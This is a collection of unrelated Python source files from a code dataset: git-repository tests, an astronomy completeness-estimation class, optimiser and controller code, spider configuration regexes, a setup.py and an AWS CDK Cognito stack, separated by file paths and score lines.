'msg1') src = repo.get_src('test/file1') assert src == ('blob', u'content1') repo.commit_one_file('test/file1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1')) src = repo.get_src('test/file1') assert src == ('blob', u'content1 modified') def test_create_file(self): repo = self._repo('test', bare=False) self._commit(repo, 'file1', 'content1', 'msg1') repo.commit_one_file( 'file2', 'content2 created', 'create1', self.u) assert repo.cat('HEAD:file1') == 'content1' assert repo.cat('HEAD:file2') == 'content2 created' def test_create_first_file(self): repo = self._repo('test', bare=False) repo.commit_one_file( 'file1', 'content1 created', 'create1', self.u) assert repo.cat('HEAD:file1') == 'content1 created' def test_create_first_file_and_more(self): repo = self._repo('test', bare=False) repo.commit_one_file( 'file1', 'content1 created', 'create1', self.u) repo.commit_one_file( 'file2', 'content2 created', 'create2', self.u) repo.commit_one_file( 'file3', 'content3 created', 'create3', self.u) repo.commit_one_file( 'file4', 'content4 created', 'create4', self.u) assert repo.cat('HEAD:file1') == 'content1 created' assert repo.cat('HEAD:file2') == 'content2 created' assert repo.cat('HEAD:file3') == 'content3 created' assert repo.cat('HEAD:file4') == 'content4 created' def test_commit_file_on_dirty_index(self): repo = self._repo('test', bare=False) repo.commit_one_file( 'file1', 'content1 created', 'create1', self.u) repo.commit_one_file( 'file2', 'content2 created', 'create2', self.u) repo.commit_one_file( 'file1', 'content1 modified', 'modify1', self.u) # Now artificially rewind the index tree state repo.call('read-tree HEAD^') repo.commit_one_file( 'file2', 'content2 modified', 'modify2', self.u) # the latest commit should not have anything related to file1 assert 'file1' not in repo.call('log -p -n1') def test_create_file_in_dir(self): repo = self._repo('test', bare=False) self._commit(repo, 'test/file1', 'content1', 'msg1') repo.commit_one_file( 'test/file2', 'content2 created', 'create1', self.u) assert repo.cat('HEAD:test/file1') == 'content1' assert repo.cat('HEAD:test/file2') == 'content2 created' def test_simple_commit_in_branch(self): repo = self._repo('test', bare=False) self._commit(repo, 'testfile1', 'content1', 'msg1') tmp_branch = repo.temp_branch_name() repo.commit_one_file('testfile1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1'), branch=tmp_branch) with mkdtemp() as tmpdir: gyt.call(['git', 'clone', repo.path, tmpdir]) repo_check = gyt.repo(tmpdir, bare=False) src = repo_check.call('show HEAD:testfile1') assert src == u'content1' repo_check.call('checkout master') src = repo_check.call('show HEAD:testfile1') assert src == u'content1' repo_check.call('checkout %s' % tmp_branch) src = repo_check.call('show HEAD:testfile1') assert src == u'content1 modified' repo_check.call('checkout master') src = repo_check.call('show HEAD:testfile1') assert src == u'content1' def test_simple_commit_in_branch_in_subdir(self): repo = self._repo('test', bare=False) self._commit(repo, 'test/file1', 'content1', 'msg1') tmp_branch = repo.temp_branch_name() repo.commit_one_file('test/file1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1'), branch=tmp_branch) with mkdtemp() as tmpdir: gyt.call(['git', 'clone', repo.path, tmpdir]) repo_check = gyt.repo(tmpdir, bare=False) src = repo_check.call('show HEAD:test/file1') assert src == u'content1' repo_check.call('checkout master') src = repo_check.call('show HEAD:test/file1') assert src == u'content1' repo_check.call('checkout %s' % tmp_branch) src = repo_check.call('show HEAD:test/file1') assert src == u'content1 modified' repo_check.call('checkout master') src = repo_check.call('show HEAD:test/file1') assert src == u'content1' def test_simple_commit_in_branch_creates_branch(self): repo = self._repo('test', bare=False) self._commit(repo, 'testfile1', 'content1', 'msg1') assert repo.get_branches() == ['master'] tmp_branch = repo.temp_branch_name() repo.commit_one_file('testfile1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1'), branch=tmp_branch) assert repo.get_branches() == ['master', tmp_branch] def test_simple_commit_in_branch_and_delete_branch(self): repo = self._repo('test', bare=False) self._commit(repo, 'testfile1', 'content1', 'msg1') tmp_branch = repo.temp_branch_name() repo.commit_one_file('testfile1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1'), branch=tmp_branch) assert tmp_branch in repo.get_branches() repo.remove_temp_branch(tmp_branch) assert tmp_branch not in repo.get_branches() assert repo.get_branches() == ['master'] def test_simple_commit_in_another_branch(self): repo = self._repo('test', bare=False) self._commit(repo, 'testfile1', 'content1', 'msg1') branch = 'mybranch' repo.commit_one_file('testfile1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1'), branch=branch) assert branch in repo.get_branches() assert set(repo.get_branches()) == set(['master', branch])
2.21875
2
py/desitarget/train/data_preparation/PredCountsFromQLF_ClassModule.py
echaussidon/desitarget
13
11010
<reponame>echaussidon/desitarget #!/usr/bin/env python3 # -*- coding:utf-8 -*- import re import numpy as np from scipy.interpolate import interp2d from scipy.interpolate import interp1d class PredCountsFromQLF_Class(): def __init__(self): self.QLF_OK = False self.EFF_OK = False self.QLF_EFF_OK = False # QLF self.QLF_nz = 0 self.QLF_stepz = 0 # self.QLF_tabz = None self.QLF_zlimit = None self.QLF_nmag = 0 self.QLF_stepmag = 0 self.QLF_tabmag = None self.QLF_maglimit = None self.QLF_dNdzdmag = None self.QLF_Ndzdmag = None # EFF self.EFF_zlimit = None self.EFF_maglimit = None self.EFF_dzdmag = None # QLF_EFF self.QLF_EFF_zlimit = None self.QLF_EFF_maglimit = None self.interpEFF_dzdmag = None self.interpQLF_dNdzdmag = None self.interpQLF_EFF_dNdzdmag = None self.QLF_EFF_dNdz = None self.QLF4Compl_dNdz = None self.Compl_dz = None self.QLF_EFF_dNdmag = None self.QLF4Compl_dNdmag = None self.Compl_dmag = None self.QLF_EFF_dNdzdmag = None self.QLF4Compl_dNdzdmag = None self.Compl_dzdmag = None def LoadQLF_Data(self, fpn_QLF_Data, mMzred=np.array([0., 6.]), skyArea=10000.): # Data loading in "dataStr" dataStr = np.loadtxt(fpn_QLF_Data, dtype=str, delimiter='\n') self.QLF_nz = len(re.findall(r'\d+(?:\.\d+)?', dataStr[0])) - 1 self.QLF_nmag = len(dataStr) # ZRED self.QLF_zlimit = np.linspace(mMzred[0], mMzred[1], self.QLF_nz + 1, endpoint=True) self.QLF_stepz = self.QLF_zlimit[1] - self.QLF_zlimit[0] # self.QLF_tabz = self.QLF_zlimit[0:-1] + self.QLF_stepz / 2. self.QLF_tabmag = np.zeros(self.QLF_nmag) self.QLF_dNdzdmag = np.zeros((self.QLF_nmag + 1, self.QLF_nz + 1)) for nL, line in enumerate(dataStr): dNdzdmag = re.findall(r'\d+(?:\.\d+)?', line) dNdzdmag = np.asarray(dNdzdmag).astype(np.float) self.QLF_tabmag[nL] = dNdzdmag[0] self.QLF_dNdzdmag[nL + 1, 1:] = dNdzdmag[1:] self.QLF_stepmag = self.QLF_tabmag[1] - self.QLF_tabmag[0] # MAG self.QLF_maglimit = np.zeros(self.QLF_nmag + 1) self.QLF_maglimit[0:-1] = self.QLF_tabmag - self.QLF_stepmag / 2. self.QLF_maglimit[-1] = self.QLF_maglimit[-2] + self.QLF_stepmag self.QLF_dNdzdmag /= skyArea self.QLF_Ndzdmag = np.cumsum(np.cumsum( self.QLF_dNdzdmag, axis=0), axis=1) self.QLF_OK = True self.QLF_EFF_OK = False def LoadEffData(self, EFFdata, EFFzlimit, EFFmaglimit): self.EFF_dzdmag = np.copy(EFFdata) self.EFF_zlimit = np.copy(EFFzlimit) self.EFF_maglimit = np.copy(EFFmaglimit) self.EFF_OK = True self.QLF_EFF_OK = False def PrelOpFunc(self): if self.QLF_OK & self.EFF_OK & (not self.QLF_EFF_OK): # QLF_EFF_zlimit self.QLF_EFF_zlimit = np.unique(np.hstack((self.QLF_zlimit, self.EFF_zlimit))) maxQLF_EFF_zlimit = min(float(np.max(self.QLF_zlimit)), float(np.max(self.EFF_zlimit))) minQLF_EFF_zlimit = max(float(np.min(self.QLF_zlimit)), float(np.min(self.EFF_zlimit))) test = (self.QLF_EFF_zlimit >= minQLF_EFF_zlimit) & \ (self.QLF_EFF_zlimit <= maxQLF_EFF_zlimit) self.QLF_EFF_zlimit = self.QLF_EFF_zlimit[test] # QLF_EFFmaglimit self.QLF_EFF_maglimit = np.unique( np.hstack((self.QLF_maglimit, self.EFF_maglimit))) maxQLF_EFF_maglimit = min(float(np.max(self.QLF_maglimit)), float(np.max(self.EFF_maglimit))) minQLF_EFF_maglimit = max(float(np.min(self.QLF_maglimit)), float(np.min(self.EFF_maglimit))) test = (self.QLF_EFF_maglimit >= minQLF_EFF_maglimit) & \ (self.QLF_EFF_maglimit <= maxQLF_EFF_maglimit) self.QLF_EFF_maglimit = self.QLF_EFF_maglimit[test] xnew = self.QLF_EFF_zlimit ynew = self.QLF_EFF_maglimit # EFF x = self.EFF_zlimit.flatten() y = self.EFF_maglimit.flatten() z = self.EFF_dzdmag # ============================================================================== # f2d_EFF = interp2d(x, y, z, kind = 'linear', # copy = True, bounds_error = True) # interpEFF_dzdmag = f2d_EFF(xnew, ynew) # ============================================================================== interpXinds = np.digitize(xnew, x, right=True) - 1 interpXinds = np.maximum(interpXinds, 0) interpYinds = np.digitize(ynew, y, right=True) - 1 interpYinds = np.maximum(interpYinds, 0) interpXYgridInds = np.meshgrid(interpXinds, interpYinds) self.interpEFF_dzdmag = z[interpXYgridInds[1], interpXYgridInds[0]] # QLF x = self.QLF_zlimit.flatten() y = self.QLF_maglimit.flatten() z = self.QLF_Ndzdmag f2d_QLF = interp2d(x, y, z, kind='linear', copy=True, bounds_error=True) interpQLF_Ndzdmag = f2d_QLF(xnew, ynew) interpQLF_dNdzdmag = np.copy(interpQLF_Ndzdmag) interpQLF_dNdzdmag[:, 1:] -= np.copy(interpQLF_dNdzdmag[:, :-1]) interpQLF_dNdzdmag[1:, :] -= np.copy(interpQLF_dNdzdmag[:-1, :]) self.interpQLF_dNdzdmag = interpQLF_dNdzdmag interpQLF_EFF_dNdzdmag = np.zeros(self.interpQLF_dNdzdmag.shape) interpQLF_EFF_dNdzdmag = self.interpEFF_dzdmag * self.interpQLF_dNdzdmag self.interpQLF_EFF_dNdzdmag = interpQLF_EFF_dNdzdmag self.QLF_EFF_OK = True def ZREDComplEvalFunc(self, zlimit): if self.QLF_EFF_OK: xnew = self.QLF_EFF_zlimit assert(np.min(zlimit) >= np.min(xnew)) assert(np.max(zlimit) <= np.max(xnew)) interpQLF_dNdz = np.sum(self.interpQLF_dNdzdmag, axis=0) interpQLF_Ndz = np.cumsum(interpQLF_dNdz) # QLF_EFF dNdz interpQLF_EFF_dNdz = np.sum(self.interpQLF_EFF_dNdzdmag, axis=0) interpQLF_EFF_Ndz = np.cumsum(interpQLF_EFF_dNdz) f1d_QLF_EFF = interp1d(xnew, interpQLF_EFF_Ndz, kind='linear', copy=True, bounds_error=True) f1d_QLF = interp1d(xnew, interpQLF_Ndz, kind='linear', copy=True, bounds_error=True) self.QLF_EFF_dNdz = f1d_QLF_EFF(zlimit) self.QLF_EFF_dNdz[1:] -= np.copy(self.QLF_EFF_dNdz[:-1]) self.QLF4Compl_dNdz = f1d_QLF(zlimit) self.QLF4Compl_dNdz[1:] -= np.copy(self.QLF4Compl_dNdz[:-1]) self.Compl_dz = self.QLF_EFF_dNdz[1:] / self.QLF4Compl_dNdz[1:] self.Compl_dz[np.isnan(self.Compl_dz)] = 0. return self.Compl_dz def RComplEvalFunc(self, maglimit): if self.QLF_EFF_OK: ynew = self.QLF_EFF_maglimit assert(np.min(maglimit) >= np.min(ynew)) assert(np.max(maglimit) <= np.max(ynew)) interpQLF_dNdmag = np.sum(self.interpQLF_dNdzdmag, axis=1) interpQLF_Ndmag = np.cumsum(interpQLF_dNdmag) # QLF_EFF dNdmag interpQLF_EFF_dNdmag = np.sum(self.interpQLF_EFF_dNdzdmag, axis=1) interpQLF_EFF_Ndmag = np.cumsum(interpQLF_EFF_dNdmag) f1d_QLF_EFF = interp1d(ynew, interpQLF_EFF_Ndmag, kind='linear', copy=True, bounds_error=True) f1d_QLF = interp1d(ynew, interpQLF_Ndmag, kind='linear', copy=True, bounds_error=True) self.QLF_EFF_dNdmag = f1d_QLF_EFF(maglimit) self.QLF_EFF_dNdmag[1:] -= np.copy(self.QLF_EFF_dNdmag[:-1]) self.QLF4Compl_dNdmag = f1d_QLF(maglimit) self.QLF4Compl_dNdmag[1:] -= np.copy(self.QLF4Compl_dNdmag[:-1]) self.Compl_dmag = self.QLF_EFF_dNdmag[1:] / self.QLF4Compl_dNdmag[1:] self.Compl_dmag[np.isnan(self.Compl_dmag)] = 0. return self.Compl_dmag def R_ZREDComplEvalFunc(self, zlimit, maglimit): if self.QLF_EFF_OK: xnew = self.QLF_EFF_zlimit assert(np.min(zlimit) >= np.min(xnew)) assert(np.max(zlimit) <= np.max(xnew)) ynew = self.QLF_EFF_maglimit assert(np.min(maglimit) >= np.min(ynew)) assert(np.max(maglimit) <= np.max(ynew)) interpQLF_EFF_Ndzdmag = np.cumsum(np.cumsum(self.interpQLF_EFF_dNdzdmag, axis=0), axis=1) f2d_QLF_EFF = interp2d(xnew, ynew, interpQLF_EFF_Ndzdmag, kind='linear', copy=True, bounds_error=True) QLF_EFF4Compl_Ndzdmag = f2d_QLF_EFF(zlimit, maglimit) QLF_EFF4Compl_dNdzdmag = np.copy(QLF_EFF4Compl_Ndzdmag) QLF_EFF4Compl_dNdzdmag[:, 1:] -= np.copy(QLF_EFF4Compl_dNdzdmag[:, :-1]) QLF_EFF4Compl_dNdzdmag[1:, :] -= np.copy(QLF_EFF4Compl_dNdzdmag[:-1, :]) self.QLF_EFF4Compl_dNdzdmag = QLF_EFF4Compl_dNdzdmag # QLF interpQLF_Ndzdmag = np.cumsum(np.cumsum(self.interpQLF_dNdzdmag, axis=0), axis=1) f2d_QLF = interp2d(xnew, ynew, interpQLF_Ndzdmag, kind='linear', copy=True, bounds_error=True) QLF4Compl_Ndzdmag = f2d_QLF(zlimit, maglimit) QLF4Compl_dNdzdmag = np.copy(QLF4Compl_Ndzdmag) QLF4Compl_dNdzdmag[:, 1:] -= np.copy(QLF4Compl_dNdzdmag[:, :-1]) QLF4Compl_dNdzdmag[1:, :] -= np.copy(QLF4Compl_dNdzdmag[:-1, :]) self.QLF4Compl_dNdzdmag = QLF4Compl_dNdzdmag self.Compl_dzdmag = self.QLF_EFF4Compl_dNdzdmag[1:, 1:] / self.QLF4Compl_dNdzdmag[1:, 1:] self.Compl_dzdmag[np.isnan(self.Compl_dzdmag)] = 0. return self.Compl_dzdmag def R_ZRED_EffVarEvalFunc(self, OBJ_QSO_dNdzdmag): self.EffVar4Compl_dzdmag = None self.Eff4Compl_dzdmag = np.copy(self.Compl_dzdmag) if True: self.EffVar4Compl_dzdmag = self.Eff4Compl_dzdmag * (1. - self.Eff4Compl_dzdmag) self.EffVar4Compl_dzdmag /= OBJ_QSO_dNdzdmag self.EffVar4Compl_dzdmag[OBJ_QSO_dNdzdmag == 0.] = 0. else: self.Count4Complt_Ndzdmag = self.Eff4Compl_dzdmag * OBJ_QSO_dNdzdmag self.EffVar4Compl_dzdmag = OBJ_QSO_dNdzdmag - self.Count4Complt_Ndzdmag + 1. self.EffVar4Compl_dzdmag *= self.Count4Complt_Ndzdmag + 1. self.EffVar4Compl_dzdmag /= (OBJ_QSO_dNdzdmag + 2)**2 * (OBJ_QSO_dNdzdmag + 3) self.EffVar4Compl_dzdmag[OBJ_QSO_dNdzdmag == 0.] = 0. return self.EffVar4Compl_dzdmag def ZRED_EffVarEvalFunc(self): self.EffVar4Compl_dz = self.EffVar4Compl_dzdmag * (self.QLF4Compl_dNdzdmag[1:, 1:])**2 self.EffVar4Compl_dz = np.sum(self.EffVar4Compl_dz, axis=0) tmp_var = np.sum(self.QLF4Compl_dNdzdmag[1:, 1:], axis=0)**2 self.EffVar4Compl_dz /= tmp_var self.EffVar4Compl_dz[tmp_var == 0.] = 0. return self.EffVar4Compl_dz def R_EffVarEvalFunc(self): self.EffVar4Compl_dmag = self.EffVar4Compl_dzdmag * (self.QLF4Compl_dNdzdmag[1:, 1:])**2 self.EffVar4Compl_dmag = np.sum(self.EffVar4Compl_dmag, axis=1) tmp_var = np.sum(self.QLF4Compl_dNdzdmag[1:, 1:], axis=1)**2 self.EffVar4Compl_dmag /= tmp_var self.EffVar4Compl_dmag[tmp_var == 0.] = 0. return self.EffVar4Compl_dmag
1.914063
2
safe_control_gym/controllers/__init__.py
gokhanalcan/safe-control-gym
0
11011
"""Register controllers. """ from safe_control_gym.utils.registration import register register(id="mpc", entry_point="safe_control_gym.controllers.mpc.mpc:MPC", config_entry_point="safe_control_gym.controllers.mpc:mpc.yaml") register(id="linear_mpc", entry_point="safe_control_gym.controllers.mpc.linear_mpc:LinearMPC", config_entry_point="safe_control_gym.controllers.mpc:linear_mpc.yaml") register(id="gp_mpc", entry_point="safe_control_gym.controllers.mpc.gp_mpc:GPMPC", config_entry_point="safe_control_gym.controllers.mpc:gp_mpc.yaml") register(id="mpsc", entry_point="safe_control_gym.controllers.mpsc.mpsc:MPSC", config_entry_point="safe_control_gym.controllers.mpsc:mpsc.yaml") register(id="ppo", entry_point="safe_control_gym.controllers.ppo.ppo:PPO", config_entry_point="safe_control_gym.controllers.ppo:ppo.yaml") register(id="safe_explorer_ppo", entry_point="safe_control_gym.controllers.safe_explorer.safe_ppo:SafeExplorerPPO", config_entry_point="safe_control_gym.controllers.safe_explorer:safe_ppo.yaml")
1.429688
1
tests/plot_profile/test_utils.py
mizeller/plot_profile
0
11012
"""Test module ``plot_profile/utils.py``.""" # Standard library import logging # First-party from plot_profile.utils import count_to_log_level def test_count_to_log_level(): assert count_to_log_level(0) == logging.ERROR assert count_to_log_level(1) == logging.WARNING assert count_to_log_level(2) == logging.INFO assert count_to_log_level(3) == logging.DEBUG
2.015625
2
spider/utilities/util_config.py
YunofHD/PSpider
0
11013
<reponame>YunofHD/PSpider<gh_stars>0 # _*_ coding: utf-8 _*_ """ util_config.py by xianhu """ __all__ = [ "CONFIG_FETCH_MESSAGE", "CONFIG_PARSE_MESSAGE", "CONFIG_MESSAGE_PATTERN", "CONFIG_URL_LEGAL_PATTERN", "CONFIG_URL_ILLEGAL_PATTERN", ] # define the structure of message, used in Fetcher and Parser CONFIG_FETCH_MESSAGE = "priority=%s, keys=%s, deep=%s, repeat=%s, url=%s" CONFIG_PARSE_MESSAGE = "priority=%s, keys=%s, deep=%s, url=%s" CONFIG_MESSAGE_PATTERN = r"priority=(?P<priority>\d+),\s*keys=(?P<keys>.+?),\s*deep=(?P<deep>\d+),\s*(repeat=(?P<repeat>\d+),\s*)?url=(?P<url>.+)$" # define url_legal_pattern and url_illegal_pattern CONFIG_URL_LEGAL_PATTERN = r"^https?:[^\s]+?\.[^\s]+?" CONFIG_URL_ILLEGAL_PATTERN = r"\.(cab|iso|zip|rar|tar|gz|bz2|7z|tgz|apk|exe|app|pkg|bmg|rpm|deb|dmg|jar|jad|bin|msi|" \ "pdf|doc|docx|xls|xlsx|ppt|pptx|txt|md|odf|odt|rtf|py|java|c|cc|js|css|log|csv|tsv|" \ "jpg|jpeg|png|gif|bmp|xpm|xbm|ico|drm|dxf|eps|psd|pcd|pcx|tif|tiff|" \ "mp3|mp4|swf|mkv|avi|flv|mov|wmv|wma|3gp|mpg|mpeg|mp4a|wav|ogg|rmvb)$"
1.789063
2
modcma/__main__.py
IOHprofiler/ModularCMAES
2
11014
"""Allows the user to call the library as a cli-module.""" from argparse import ArgumentParser from .modularcmaes import evaluate_bbob parser = ArgumentParser(description="Run single function CMAES") parser.add_argument( "-f", "--fid", type=int, help="bbob function id", required=False, default=5 ) parser.add_argument( "-d", "--dim", type=int, help="dimension", required=False, default=5 ) parser.add_argument( "-i", "--iterations", type=int, help="number of iterations per agent", required=False, default=50, ) parser.add_argument( "-l", "--logging", required=False, action="store_true", default=False ) parser.add_argument("-L", "--label", type=str, required=False, default="") parser.add_argument("-s", "--seed", type=int, required=False, default=42) parser.add_argument("-p", "--data_folder", type=str, required=False) parser.add_argument("-a", "--arguments", nargs="+", required=False) args = vars(parser.parse_args()) for arg in args.pop("arguments") or []: # pylint: disable=exec-used exec(arg, None, args) evaluate_bbob(**args)
2.953125
3
src/rto/optimization/solvers/de.py
vicrsp/rto
0
11015
<filename>src/rto/optimization/solvers/de.py import numpy as np class DifferentialEvolution: def __init__(self, lb, ub, mutation_prob=0.5, pop_size=10, max_generations=100, de_type='rand/1/bin', callback=None): self.lb = np.asarray(lb).reshape(1, -1) self.ub = np.asarray(ub).reshape(1, -1) self.population_size = pop_size self.max_generations = max_generations self.num_variables = len(lb) self.mutation_prob = mutation_prob self.callback = callback self.base, self.d, self.rec = de_type.split('/') self.norm_lb = self.normalize(self.lb).flatten() self.norm_ub = self.normalize(self.ub).flatten() self.reset() def reset(self): self.fobj_evals = 0 self.population_fobj = [] self.best_objective = np.Infinity self.best_solution = [] def normalize(self, x): norm_x = np.zeros_like(x) for i in range(x.shape[0]): norm_x[i, :] = 100 * (x[i] - self.lb) / (self.ub - self.lb) return norm_x def denormalize(self, x): xr = x.reshape(-1, self.num_variables) denorm_x = np.zeros_like(xr) for i in range(xr.shape[0]): denorm_x[i, :] = xr[i] * (self.ub - self.lb) / 100 + self.lb return denorm_x def initialize_population(self): pop_size = (self.population_size, self.num_variables) self.population = np.random.uniform( low=self.norm_lb, high=self.norm_ub, size=pop_size) self.initial_population = self.population def evaluate_population_cost(self, population): pop_fobj = [] pop_g = [] # Calculating the fitness value of each solution in the current population. for sol in population: cost, g = self.eval_objective(sol) if((cost < self.best_objective) & (not np.any(g > 0))): self.best_objective = cost self.best_solution = sol pop_fobj.append(cost) pop_g.append(g) pop_fobj = np.array(pop_fobj) pop_g = np.asarray(pop_g) self.fobj_evals = self.fobj_evals + pop_fobj.shape[0] self.population_fobj = pop_fobj self.population_g = pop_g if(self.callback != None): self.callback(self.denormalize(population), pop_fobj, pop_g) return pop_fobj, pop_g def select_base_vector(self, population, cost): if(self.base == 'rand'): r1 = np.random.randint(0, self.population_size) return r1, population[r1] elif(self.base == 'mean'): return None, np.mean(population, axis=0) elif(self.base == 'best'): best_idx = np.argmin(cost) return None, population[best_idx] else: raise ValueError('Base={} is not implemented!'.format(self.base)) def select_difference_vector(self, r1, population): if(self.d == "1"): r2 = np.random.randint(0, self.population_size) if(r1 != None): while(r2 == r1): r2 = np.random.randint(0, self.population_size) r3 = np.random.randint(0, self.population_size) if(r1 != None): while(r3 == r1 | r3 == r2): r3 = np.random.randint(0, self.population_size) return population[r2] - population[r3] else: raise ValueError( 'd={} is not implemented!'.format(self.d)) def select_scale_factor(self): return np.random.rand() * 0.5 + 0.5 # U(0.5, 1.0) def mutate(self, target, scale_factor, difference): return target + scale_factor * difference def recombine(self, v, x): if (self.rec == "bin"): u_i = [] for i, v_i in enumerate(v): u_j = [] delta = np.random.randint(0, self.num_variables) for j in range(self.num_variables): randnum = np.random.rand() if((randnum <= self.mutation_prob) | (j == delta)): u_j.append(v_i[j]) else: u_j.append(x[i, j]) u_i.append(u_j) return np.asarray(u_i) else: raise ValueError( 'Recombination={} is not implemented!'.format(self.rec)) def validate_bounds(self, x): xc = [] for i, value in enumerate(x): if((value < self.norm_lb[i]) | (value > self.norm_ub[i])): # replace the variable by a random value inside the bounds xc.append(np.random.rand() * (self.norm_ub[i] - self.norm_lb[i]) + self.norm_lb[i]) else: xc.append(value) return np.asarray(xc) def eval_objective(self, x): cost, g = self.fobj(self.denormalize(x).flatten()) return cost, np.asarray(g) def select_survivors(self, u, x, fx, gx): survivors = [] for i in range(self.population_size): u_i = self.validate_bounds(u[i]) gx_i = gx[i] fx_i = fx[i] fu, gu = self.eval_objective(u_i) is_valid = (fu <= fx_i) # only use the rule for restricted problems if(len(gu) > 0): rule1 = np.all(gu <= 0) & np.all(gx_i <= 0) & (fu <= fx_i) rule2 = np.all(gu <= 0) & np.any(gx_i > 0) rule3 = np.any(gu > 0) & np.all(np.maximum(gu, np.zeros_like( gu)) <= np.maximum(gx_i, np.zeros_like(gx_i))) is_valid = rule1 | rule2 | rule3 if(is_valid): survivors.append(u_i) else: survivors.append(x[i]) return np.asarray(survivors) def run(self, func, debug=False): self.reset() self.fobj = func self.initialize_population() for i in range(self.max_generations): fobj, g = self.evaluate_population_cost(self.population) v = [] # use penalization for base vector selection only # fobj_penalized = fobj + 1000 * np.maximum(np.zeros(self.population_size), np.max(np.asarray(g), axis=1)) for _ in range(self.population_size): r1, base = self.select_base_vector(self.population, None) difference = self.select_difference_vector(r1, self.population) scale_factor = self.select_scale_factor() v.append(self.mutate(base, scale_factor, difference)) v = np.asarray(v) u = self.recombine(v, self.population) self.population = self.select_survivors( u, self.population, fobj, g) # if(debug == True): # print('Progress: {:.2f}%'.format( # 100 * i / self.max_generations)) if((debug == True) & (self.best_objective != np.Infinity)): print('Best fobj: {}'.format(self.best_objective)) # print('Best sol: {}'.format( # self.denormalize(self.best_solution))) if(self.best_objective != np.Infinity): return self.best_objective, self.denormalize(self.best_solution).flatten() else: return np.Infinity, None
2.671875
3
openmdao/matrices/csr_matrix.py
onodip/OpenMDAO
0
11016
"""Define the CSRmatrix class.""" import numpy as np from scipy.sparse import coo_matrix from six import iteritems from openmdao.matrices.coo_matrix import COOMatrix class CSRMatrix(COOMatrix): """ Sparse matrix in Compressed Row Storage format. """ def _build(self, num_rows, num_cols): """ Allocate the matrix. Parameters ---------- num_rows : int number of rows in the matrix. num_cols : int number of cols in the matrix. """ data, rows, cols = self._build_sparse(num_rows, num_cols) # get a set of indices that sorts into row major order srtidxs = np.lexsort((cols, rows)) data = data[srtidxs] rows = rows[srtidxs] cols = cols[srtidxs] # now sort these back into ascending order (our original stacked order) # so in _update_submat() we can just extract the individual index # arrays that will map each block into the combined data array. revidxs = np.argsort(srtidxs) metadata = self._metadata for key, (ind1, ind2, idxs, jac_type, factor) in iteritems(metadata): if idxs is None: metadata[key] = (revidxs[ind1:ind2], jac_type, factor) else: # apply the reverse index to each part of revidxs so that # we can avoid copying the index array during updates. metadata[key] = (revidxs[ind1:ind2][np.argsort(idxs)], jac_type, factor) # data array for the CSR will be the same as for the COO since # it was already in sorted order. coo = coo_matrix((data, (rows, cols)), shape=(num_rows, num_cols)) coo_data_size = coo.data.size self._matrix = coo.tocsr() # make sure data size is the same between coo and csr, else indexing is # messed up if coo_data_size != self._matrix.data.size: raise ValueError("CSR matrix data contains duplicate row/col entries. " "This would break internal indexing.")
2.828125
3
setup.py
medchemfi/sdfconf
6
11017
# -*- coding: utf-8 -*- from setuptools import setup, find_packages import re import os def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() with open("src/sdfconf/_version.py", "rt") as vf: VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]" for line in vf: mo = re.search(VSRE, line, re.M) if mo: verstr = mo.group(1) break if not mo: raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,)) setup(name = 'sdfconf', version = verstr, description = ("Diverse manipulation and analysis tool for .sdf files."), long_description = read('README.rst'), install_requires = ['numpy>=1.7.1','matplotlib>=1.4.2'], author = '<NAME>', author_email = '<EMAIL>', maintainer = '<NAME>', maintainer_email = '<EMAIL>', packages = ['sdfconf'], package_dir = {'sdfconf':'src/sdfconf'}, keywords = 'sdf mol2 conformation analyze histogram', url = 'http://users.jyu.fi/~pentikai/', license = 'MIT/expat', entry_points = {'console_scripts': ['sdfconf = sdfconf.runner:main'], 'setuptools.installation': ['eggsecutable = sdfconf.runner:main',], }, classifiers= ['Development Status :: 4 - Beta', 'Environment :: Console', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: MIT License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python :: 2.7', #'Programming Language :: Python :: 3', 'Topic :: Scientific/Engineering :: Bio-Informatics', 'Topic :: Scientific/Engineering :: Chemistry' , 'Topic :: Software Development :: Libraries', ], ##FIXME #''' #package_data = { # 'sample':['sample_data.sdf'] # }, #''' )
1.78125
2
stacks/cognito_stack.py
adamdubey/devops-serverless-app-aws-cdk
0
11018
from aws_cdk import ( aws_cognito as cognito, aws_iam as iam, aws_ssm as ssm, core ) class CognitoStack(core.Stack): def __init__(self, scope: core.Construct, id: str, **kwargs) -> None: super().__init__(scope, id, **kwargs) prj_name = self.node.try_get_context("project_name") env_name = self.node.try_get_context("env") user_pool = cognito.CfnUserPool(self, 'cognitouserpool', auto_verified_attributes = [ 'email' ], username_attributes = [ 'email', 'phone_number' ], user_pool_name = prj_name + '-user-pool', schema = [ { 'attributeDataType': 'String', 'name': 'param1', 'mutable': True } ], policies = cognito.CfnUserPool.PoliciesProperty( password_policy = cognito.CfnUserPool.PasswordPolicyProperty( minimum_length = 10, require_lowercase = True, require_numbers = True, require_symbols = False, require_uppercase = True ) ) ) user_pool_client = cognito.CfnUserPoolClient(self, 'pool-client', user_pool_id = user_pool.ref, client_name = env_name + '-app-client' ) identity_pool = cognito.CfnIdentityPool(self, 'identity-pool', allow_unauthenticated_identities = False, cognito_identity_providers = [ cognito.CfnIdentityPool.CognitoIdentityProviderProperty( client_id = user_pool_client.ref, provider_name = user_pool.attr_provider_name ) ], identity_pool_name = prj_name + '-identity-pool' ) ssm.StringParameter(self, 'app-id', parameter_name = '/' + env_name + '/cognito-app-client-id', string_value = user_pool_client.ref ) ssm.StringParameter(self, 'user-pool-id', parameter_name = '/' + env_name + '/cognito-user-pool-id', string_value = user_pool_client.user_pool_id ) ssm.StringParameter(self, 'identity-pool-id', parameter_name = '/' + env_name + '/cognito-identity-pool-id', string_value = identity_pool.ref )
2.015625
2
cloudrail/knowledge/rules/aws/context_aware/s3_bucket_policy_vpc_endpoint_rule.py
my-devops-info/cloudrail-knowledge
0
11019
